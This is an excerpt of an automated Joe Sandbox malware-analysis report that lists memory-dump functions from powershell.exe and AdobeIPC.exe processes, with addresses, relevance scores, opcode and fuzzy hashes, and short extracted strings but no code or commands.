Instruction ID: 32e1270bfb6b88df4deccc5c047f143ca742647d8b8a6b98757d4c823bfcde9a
Opcode Fuzzy Hash: 28a1e9dc9c9e7bc44f2e78feaf54a35258db75ae6e8ed94cd02c7525f27840e0
Instruction Fuzzy Hash: 29410A71A0DB8C8FDB589F5C981A6B8BBE0FB94310F10426FE459C3262DB64B95587C2

Function 00007FFD9B6BEB80 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2072959674.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b6bd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849e3a4c6c80de212b9c08a52d808bc0a7581adbde7ba64c8a63f06ceb0ef5cf
Instruction ID: 62acf5239a5980f3ecfab90d71ac5ff0c0c3b0c98c5d0bdacb377f52c953df3f
Opcode Fuzzy Hash: 849e3a4c6c80de212b9c08a52d808bc0a7581adbde7ba64c8a63f06ceb0ef5cf
Instruction Fuzzy Hash: 8741287150EBC84FD7668B2898519623FF0EF52320B1605EFD089CF1A7D629B806CB92

Function 00007FFD9B8A40BF Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2075113074.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88573e94d0f090d7d4e6cb6b702341f1a5ff87e111492d96d2e74f7bc7516cf
Instruction ID: bfde5308ceb074a1d2700bf9e5a644c575a484cc6f4cf46edbddedd50a170086
Opcode Fuzzy Hash: b88573e94d0f090d7d4e6cb6b702341f1a5ff87e111492d96d2e74f7bc7516cf
Instruction Fuzzy Hash: 0521E422B0E98B4FEBB9CB5C54626746AC2EF98310B5E00BED15EC71F2DE18ED018251

Function 00007FFD9B8A43BC Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2075113074.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0750f71121e62589a1ca9b292a2267008cefa6defc96ac967ec0b519900f2714
Instruction ID: 32c4dc3ae5043bc597aed611fe97b49c2956b044062d9d8c8133b9189cf50f3d
Opcode Fuzzy Hash: 0750f71121e62589a1ca9b292a2267008cefa6defc96ac967ec0b519900f2714
Instruction Fuzzy Hash: D711C232F0F5494FEBB9E75894B19B876D1EF48310B4E00BDD15DC71A6D915BD008260

Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2074069354.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b7d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41

Function 00007FFD9B7DA2AC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2074069354.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b7d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d98feb35baeb824adeb3d916aed7fd42d7c7720bc2fcfbae5bebe6fb5161d8
Instruction ID: cb6a5524daf1ebe96844527be35bc55d08bfaa3523d91d073d94318abecf1acd
Opcode Fuzzy Hash: d9d98feb35baeb824adeb3d916aed7fd42d7c7720bc2fcfbae5bebe6fb5161d8
Instruction Fuzzy Hash: B4E01A35804A4C8FDB54EF1888594E97BA0FB68211B01029AE80DC7120DB71AA58CBC2

Non-executed Functions

Function 00007FFD9B7D8995 Relevance: 5.1, Strings: 4, Instructions: 134COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B7D8A6A
N_^, xrefs: 00007FFD9B7D8A2A
N_^, xrefs: 00007FFD9B7D89C9
N_^, xrefs: 00007FFD9B7D8AC2

Memory Dump Source

Source File: 0000000C.00000002.2074069354.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b7d0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 77f66fb9b8c0c4e45892f072958831a7297bb1518f1a1de6d4213756f93587a8
Instruction ID: cf1518ebfd17c178d853f5f5ca3f6c468f93be112180805f4a00d4fb6051e318
Opcode Fuzzy Hash: 77f66fb9b8c0c4e45892f072958831a7297bb1518f1a1de6d4213756f93587a8
Instruction Fuzzy Hash: DA4173A2A0F7D64FE3164BA95C791957FA0EF9226470A43F7C1D8CB0B3ED18150B8356

Function 00007FFD9B7D8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^F, xrefs: 00007FFD9B7D8C7A
N_^4, xrefs: 00007FFD9B7D8BFA
N_^7, xrefs: 00007FFD9B7D8C12
N_^J, xrefs: 00007FFD9B7D8C8A

Memory Dump Source

Source File: 0000000C.00000002.2074069354.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b7d0000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: 33318d810732aedc5b8d73b2cd603b97cdeee6fc6f3f35bf73613f10f45d9dd5
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: 3821497BB080654ED305BBBCBC289DD3750DFD423935642F2D2A9CB183EC14708A86C1

Analysis Process: powershell.exePID: 3980, Parent PID: 7364COMMON

Executed Functions

Function 00007FFD9B8D431D Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

B, xrefs: 00007FFD9B8D4320

Memory Dump Source

Source File: 0000000E.00000002.2272010441.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 26e1a48bb0d0c32f00aef9e5b3709023cfebd47ee0a1f75a13062112de2f3ec1
Instruction ID: 48a803597f5150e9b222a5d40fec22aca30c4a23551fab3db2abb5bea0a519d7
Opcode Fuzzy Hash: 26e1a48bb0d0c32f00aef9e5b3709023cfebd47ee0a1f75a13062112de2f3ec1
Instruction Fuzzy Hash: 37612632B0EA8D0FE7A9DB6C54259B57BD2EF98324F0902BFD45DC71A3E915AD018341

Function 00007FFD9B80644D Relevance: .7, Instructions: 718COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271036201.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898160b3dfc10f6d8d7cdeebf9a1eca46dc2aa9ae61105992b21bf73b684336a
Instruction ID: 9cd01e74a8e4c26f1b63bfbdac3d7c209daa13965783a8cd4e0b91fcdbc3ed20
Opcode Fuzzy Hash: 898160b3dfc10f6d8d7cdeebf9a1eca46dc2aa9ae61105992b21bf73b684336a
Instruction Fuzzy Hash: 9BD19F70A08A4D8FDF98EF58C465AEDBBE1FF68340F15416AD44DD72A6CA34E841CB81

Function 00007FFD9B8D6605 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272010441.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334d2d22e8fea8629a51d972d5a32eed368f3688aa3213ac3ea0d163bd42f8d0
Instruction ID: cacf34b38c35e36eb8119c1a32cedbb545d81e263f9143c89e39909c3f6503a8
Opcode Fuzzy Hash: 334d2d22e8fea8629a51d972d5a32eed368f3688aa3213ac3ea0d163bd42f8d0
Instruction Fuzzy Hash: 04D139B2B0FACE4FEB659BA848755B57BA1EF9A210B0903FFD45CC70E3D914A9058341

Function 00007FFD9B80B418 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271036201.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369ae5b6e291aab11cd782a0d6fad06d875c93987397c8e194e973d5a9955ffc
Instruction ID: d457d6994d9a87396a1f6d2456d93788b27148fa331134a6e6f05e91c603fa67
Opcode Fuzzy Hash: 369ae5b6e291aab11cd782a0d6fad06d875c93987397c8e194e973d5a9955ffc
Instruction Fuzzy Hash: BFB14870A1DB894FE759DF5CC495AB9BBE0EF99310F1001BED0DAC31A6DA21E846CB41

Function 00007FFD9B8D4073 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272010441.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3679a4d7b1e0727fc9bdb4ab2e89d24418a2df0ee24e8e5e6478619bc4937e8b
Instruction ID: d8c156a85c231668f3abc00fac39aeb876a5ef1da9eb58b41e99f07a4167417b
Opcode Fuzzy Hash: 3679a4d7b1e0727fc9bdb4ab2e89d24418a2df0ee24e8e5e6478619bc4937e8b
Instruction Fuzzy Hash: 0E510722B0EA8A0FEBA9975C546267477D2EFD8210B1D03BFC15EC71A2DE15EC058341

Function 00007FFD9B809770 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271036201.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41439c2e67553c49c7a8573f899f6487c3e3ac79abca1a281c8bce4dfa2eb624
Instruction ID: 9955bfa815a9360f9daa60edc5c78db3cd2453da8e46d1629ec36cf6cf9c2493
Opcode Fuzzy Hash: 41439c2e67553c49c7a8573f899f6487c3e3ac79abca1a281c8bce4dfa2eb624
Instruction Fuzzy Hash: 1241EB71A0DB8C8FDB18DF5C9C1A5E97BE0FB99710F04416FE499C3252DA60A915CBC2

Function 00007FFD9B8D40BF Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272010441.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac7b57ae8c2baa784f996c867a4546f0384d02d8c62ef952572137251a15581
Instruction ID: f36f1412507b0647c8e6344793b44c3ece16518b20dff85ef2c006252833bd79
Opcode Fuzzy Hash: 5ac7b57ae8c2baa784f996c867a4546f0384d02d8c62ef952572137251a15581
Instruction Fuzzy Hash: 4D21C122B0E98A4FEBB9DB5C546267466C2EFE8210B5E03BFD15EC75E2DE14ED018241

Function 00007FFD9B8D43BC Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2272010441.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8186e5a8478c4822b198bdff948e86dc9939279ab8214192a80f295ea1575b8e
Instruction ID: 5bbefe729c022671a076427c47c40d780c2c17e25b4860461a9276627e3df85d
Opcode Fuzzy Hash: 8186e5a8478c4822b198bdff948e86dc9939279ab8214192a80f295ea1575b8e
Instruction Fuzzy Hash: 7411A032B0F5494FE7B8D75C94B49B876D2EF88320B4E03BED05DC71A6DD15AD408240

Function 00007FFD9B6EEC1F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2269821252.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b6ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
Instruction ID: 8cdb3019cab897913d6765ce472df3647c35706af6a5a10433a76114609fe482
Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
Instruction Fuzzy Hash: B701623160CE088F9BA4EF1DE48596237E0FB98320710069BD45DC755AD735F891CBC1

Function 00007FFD9B8033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271036201.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41

Function 00007FFD9B80A2CC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271036201.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
Instruction ID: e41858073a92c8185e7b6f52f89cc9e872a7864701fdcfd8e2caf4ec4f2f64af
Opcode Fuzzy Hash: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
Instruction Fuzzy Hash: 8CE04F35804A4C8FCF54EF18C8594E97BE0FF68301B0102ABE84DC7120DB719A58CBC2

Non-executed Functions

Function 00007FFD9B808BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

K_^8, xrefs: 00007FFD9B808BF2
K_^J, xrefs: 00007FFD9B808C62
K_^Y, xrefs: 00007FFD9B808CBA
K_^K, xrefs: 00007FFD9B808C6A
K_^?, xrefs: 00007FFD9B808C2A
K_^<, xrefs: 00007FFD9B808C12
K_^N, xrefs: 00007FFD9B808C72
K_^Q, xrefs: 00007FFD9B808C8A

Memory Dump Source

Source File: 0000000E.00000002.2271036201.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
API String ID: 0-2350917820
Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
Instruction ID: 0aafbbd5924e028cb88f8fb2682b7fd57e09256c17de00bbea36593f1061e17b
Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
Instruction Fuzzy Hash: 6F210477B085555ACB0676BCB8559DC77A0DF9437935642F3E028CF093DD18A48B8680

Analysis Process: AdobeIPCPID: 7632, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B7F0EFA Relevance: 3.4, Strings: 2, Instructions: 857COMMON

Download Yara Rule

Strings

5M_^, xrefs: 00007FFD9B7F0F01
4M_^, xrefs: 00007FFD9B7F1001

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID: 4M_^$5M_^
API String ID: 0-4266852409
Opcode ID: 9aa980a29b92be74447e898bf5ccc1f3fdc8d83f7ea65441d7d41e8a1aaf2414
Instruction ID: 8e834fa04e3d069f42c4876cb6ac8fc61db5a362e0cfa84ebfcf6c87542280d1
Opcode Fuzzy Hash: 9aa980a29b92be74447e898bf5ccc1f3fdc8d83f7ea65441d7d41e8a1aaf2414
Instruction Fuzzy Hash: A3C11A27F0E2DA4BD715F7BCA4759ED7B60EF81229B0A43F7D0998A0E3DC1824468295

Function 00007FFD9B7F16A9 Relevance: .9, Instructions: 858COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948fb3aeb9447a96e6e0901e4cd567f3ac06940ebc35a1f0ae2fb4d353a77fda
Instruction ID: 6d39cc71d3464db00fb252deaf5a0ab1c9f858b3631988b37e684539d4a76bd5
Opcode Fuzzy Hash: 948fb3aeb9447a96e6e0901e4cd567f3ac06940ebc35a1f0ae2fb4d353a77fda
Instruction Fuzzy Hash: 0A42C861B19A4D4FE798EB689475BBD77D2FF98304F4106B9E01DC33E6DD28A8018782

Function 00007FFD9B7F20CD Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ec317e904b1dc487f6591636650c1b714283579071e12cf14ab7750b8c465d
Instruction ID: 7ef52b37f3eaacae87adb6df8b9caa070a9805a691e82de329c80481e50c2c9b
Opcode Fuzzy Hash: 39ec317e904b1dc487f6591636650c1b714283579071e12cf14ab7750b8c465d
Instruction Fuzzy Hash: 8651FE20B0E6C94FD796ABB848746757FE5DF87219B0905FAE08DC71E7DD085806C386

Function 00007FFD9B7F1165 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb3f3ddbfb3f172062699fe0fa02b49eb5bdd675d2baaac695cca6ee4e82344
Instruction ID: 20ac78f64cc4aec84069dcb4f9f43de6f78d7476bdf579c2dc71edac48c3a634
Opcode Fuzzy Hash: 4cb3f3ddbfb3f172062699fe0fa02b49eb5bdd675d2baaac695cca6ee4e82344
Instruction Fuzzy Hash: 24418326B0E7DA4FD715E7A898B54E97FB0EF42214F4A41F6C099CB1F3DC1829058395

Function 00007FFD9B7F0C69 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555e1e1451454d8cc88f1184fd645360882875552b0adffdbb614c350469f90c
Instruction ID: e728b5a372b58a999aaf1ad3993fbc5e8629272734147575cb64f632a3a1eb22
Opcode Fuzzy Hash: 555e1e1451454d8cc88f1184fd645360882875552b0adffdbb614c350469f90c
Instruction Fuzzy Hash: 38415D21B0D68A0FE356AB3C986667C77D1EF85314B4941FAD49CC72EBDD18AC428342

Function 00007FFD9B7F0570 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b07f7f5a98c8f055a8646d2a78d19ae8fcf2824e76df67ee61628c118871ea
Instruction ID: d4a035aaf5c5283a54d8056a5c52067a78b675d24e349d451bf691db2a6ff2e3
Opcode Fuzzy Hash: f9b07f7f5a98c8f055a8646d2a78d19ae8fcf2824e76df67ee61628c118871ea
Instruction Fuzzy Hash: E531C521B1C94D0FE798EE6C846A77976C2EF98305F4506BAF00EC32E7DD24AC028345

Function 00007FFD9B7F0AB9 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dbaebe2f3334fe7578bce0f4d005b03ec15f93f65e01f9b7de565611533e660
Instruction ID: 1e0bc9d40806cb3eeaab2c598a6460a8bd35471975926a1916fbbb695a4bb616
Opcode Fuzzy Hash: 4dbaebe2f3334fe7578bce0f4d005b03ec15f93f65e01f9b7de565611533e660
Instruction Fuzzy Hash: 9031DA21F1894A4FEB48BFBC48697BD77E1EF98705F0142BAE41CC32D6DE2858418792

Function 00007FFD9B7F0975 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09fae4349e3f066b5f6b90c737d4af9d377aa2dd87897299deccd1baa1b4a4ec
Instruction ID: f6d2d7004d2536d7174b3d3ccf50301d6f2e7719a60b533884f418df2106dc31
Opcode Fuzzy Hash: 09fae4349e3f066b5f6b90c737d4af9d377aa2dd87897299deccd1baa1b4a4ec
Instruction Fuzzy Hash: 3C31A034B19A4D4FDB44EBA8D865AFDBBB1FF88304F8146B9D009D3396CE3868418781

Function 00007FFD9B7F0845 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 135ef1bb30599204bfafd5b2a797498d273c4417ff962bb5515c232e9a6242bc
Instruction ID: ca00f9ad74a100c5ea0fef438a1a6da39f6fbd6128cddef507538718332e565d
Opcode Fuzzy Hash: 135ef1bb30599204bfafd5b2a797498d273c4417ff962bb5515c232e9a6242bc
Instruction Fuzzy Hash: 4831053474DACD4FD384EB28D4A2AAD7FA1EF8520478145E9D418C33DBCD2C59458782

Function 00007FFD9B7F0807 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd33409feb68f736b7621a50b1e6ecbdf00c9f7b03e4b8f5d1f9afb9026cf75e
Instruction ID: d9ff20d813a8310e022549c536f804e1375d167712840a23711ec5aa3c7aa691
Opcode Fuzzy Hash: bd33409feb68f736b7621a50b1e6ecbdf00c9f7b03e4b8f5d1f9afb9026cf75e
Instruction Fuzzy Hash: B831A435B49ACE4FD384EB68D0A69EDBFA1FF8520878146E5D819C33DACD2C59058742

Function 00007FFD9B7F2281 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2352437292.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe05004bcbc9d50476ecd33c70896d36610985cc36adf2ead9a2f75a65f917be
Instruction ID: a6b744f101e753d53c1cf3cf601970cc6f1663681fa6526c84f4c4b6f4128098
Opcode Fuzzy Hash: fe05004bcbc9d50476ecd33c70896d36610985cc36adf2ead9a2f75a65f917be
Instruction Fuzzy Hash: A7115921B0D7990FE751AB28A8518747FE0EF86220B4A02F6F888C72B2D9185E4183C5

Analysis Process: AdobeIPC.exePID: 1436, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B7F0EFA Relevance: 3.4, Strings: 2, Instructions: 857COMMON

Download Yara Rule

Strings

5M_^, xrefs: 00007FFD9B7F0F01
4M_^, xrefs: 00007FFD9B7F1001

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID: 4M_^$5M_^
API String ID: 0-4266852409
Opcode ID: 933374e88a5ce42c21ea0d7491dfb80f199250b48c1b44d195eaa796e199f2f2
Instruction ID: dcb3d6f12a066a28f93add1e57c56e668af31a796e143a1e780552a52a34a6bf
Opcode Fuzzy Hash: 933374e88a5ce42c21ea0d7491dfb80f199250b48c1b44d195eaa796e199f2f2
Instruction Fuzzy Hash: 95C11A27F0E2DA4BD715F7BCA4759ED7B60EF81229B0A43F7D099CA0E3DC1824468294

Function 00007FFD9B7F16A9 Relevance: .9, Instructions: 858COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56adbf70f9139b716e1c02ed8893d0dd9f233a2f83b72a2f4d1236e5138d48ec
Instruction ID: 7ae36504d8da09c2ab0a5049658fc9c4a8f34dd03521ed74d3444ce037514486
Opcode Fuzzy Hash: 56adbf70f9139b716e1c02ed8893d0dd9f233a2f83b72a2f4d1236e5138d48ec
Instruction Fuzzy Hash: E242B861F19A4D4FE758EB689479ABD77D2FF98300F4106B9E05DC32E6DE28B8018781

Function 00007FFD9B7F20CD Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2431291783.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8263ec2a4603c214d49140fc976ee295febac94c45aa814bb60fa2b698900c8
